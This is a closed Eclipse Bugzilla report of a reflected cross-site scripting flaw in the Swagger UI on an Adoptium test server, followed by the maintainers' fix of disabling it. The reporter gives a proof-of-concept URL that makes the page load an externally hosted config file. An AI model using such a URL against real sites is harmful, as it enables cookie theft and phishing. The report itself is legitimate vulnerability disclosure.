Bug 580566 - Description : You are using Swagger ui to share api docs, which uses DomPurify which is vulnerable to insecure input validation and overall your domain becomes vulnerable to Reflected XSS
Summary: Description : You are using Swagger ui to share api docs, which uses DomPurif...
Status: CLOSED FIXED
Alias: None
Product: Community
Classification: Eclipse Foundation
Component: Vulnerability Reports (show other bugs)
Version: unspecified   Edit
Hardware: Other other
: P3 critical (vote)
Target Milestone: ---   Edit
Assignee: Security vulnerabilitied reported against Eclipse projects CLA
QA Contact:
URL:
Whiteboard:
Keywords: security
Depends on:
Blocks:
 
Reported: 2022-08-13 00:08 EDT by Saransh Saraf CLA
Modified: 2022-08-22 03:39 EDT (History)
12 users (show)

See Also:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Saransh Saraf CLA 2022-08-13 00:08:05 EDT 
IF you don't understand what I am talking about, just forward my email to the CEO/CTO/ Security Team.

Hi Team,
I'm Saransh Saraf, a Security Researcher and bug hunter
https://www.linkedin.com/in/saransh-saraf-2b514b20b/

I've found a bug in your website here is the detailed report :
Vulnerable Domain :  trss.adoptium.net
Vulnerability Name : Reflected Cross site scripting


Vulnerable URL : https://trss.adoptium.net/api-docs/?configUrl=https://jumpy-floor.surge.sh/test.json

Impact: The Attacker will steal cookies of use to login as him, he'll do phishing on behalf of the domain and also he'll spread malware and virus.

If you think my efforts are worth something please reward me with a bounty :)

I'm looking forward to hearing from you.
Regards
Saransh Saraf
Comment 1 Mikaël Barbero CLA 2022-08-16 05:42:38 EDT 
cc'ing Adoptium committers.
Comment 2 Shelley Lambert CLA 2022-08-16 09:48:04 EDT 
Can we add lan.xia@ca.ibm.com to have visibility of this issue?  She will be addressing this (either by updating the module, or removing the swagger UI as a resolution).
Comment 3 Mikaël Barbero CLA 2022-08-16 09:50:11 EDT 
(In reply to Shelley Lambert from comment #2)
> Can we add lan.xia@ca.ibm.com to have visibility of this issue?  She will be
> addressing this (either by updating the module, or removing the swagger UI
> as a resolution).

lan.xia@ca.ibm.com is not associated with any Eclipse account, so I cannot cc her. She will need to create an eclipse account first https://accounts.eclipse.org/user/register?destination=user
Comment 4 Shelley Lambert CLA 2022-08-16 10:07:47 EDT 
https://projects.eclipse.org/content/lan-xia-committer-eclipse-aqavit

Not sure what email is associated with that Eclipse account, but if you can, please add her.
Comment 5 Mikaël Barbero CLA 2022-08-16 10:09:04 EDT 
lan_xia@ca.ibm.com ;)
Comment 6 Lan Xia CLA 2022-08-17 23:03:35 EDT 
I disabled the Swagger ui.
Comment 7 Saransh Saraf CLA 2022-08-17 23:19:03 EDT 
Hi, thanks fixing this vulnerability,am I now eligible for some Bounty or appreciation letter
Comment 8 Mikaël Barbero CLA 2022-08-22 03:39:41 EDT 
Thanks Lan.

Saraf, Thanks for your report. I'm afraid we don't offer Bounty nor appreciation letter.